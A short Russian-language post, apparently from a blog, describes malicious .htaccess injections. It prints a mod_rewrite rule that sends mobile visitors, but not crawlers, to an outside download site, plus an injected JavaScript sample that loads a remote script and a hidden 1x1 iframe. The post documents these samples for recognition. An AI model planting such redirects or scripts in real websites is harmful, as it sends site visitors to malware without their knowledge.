«Вирус» в .htaccess

Точнее целый класс вредоносного кода, схожего тем, что трафик с мобильных устройств через .htaccess с помощью правил mod_rewrite,реагирующих на User Agent браузера перенаправляют на сторонний ресурс, где можно скачать «очень полезное ПО» или, скорее всего «совершить обновление». Выглядит примерно так

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://pda.qwertysoft.biz/?29&source=sklad-kavkaz.ru [L,R=302] # On

Коллекция вредоносного кода. Экземпляр 1.

document.write('<script src="http://kopii-vertu.ru/url.txt" type="text/javascript"></script>');
document.write('<script type="text/javascript">\r' +
'function changesite()\r' +
'{\r' +
' document.getelementbyid( "ifrm" ).src = geturl();\r' +
'}\r' +
'window.onload=changesite;\r' +
'</script>\r' +
'<iframe id="ifrm" src="" width="1" height="1" frameborder="no">');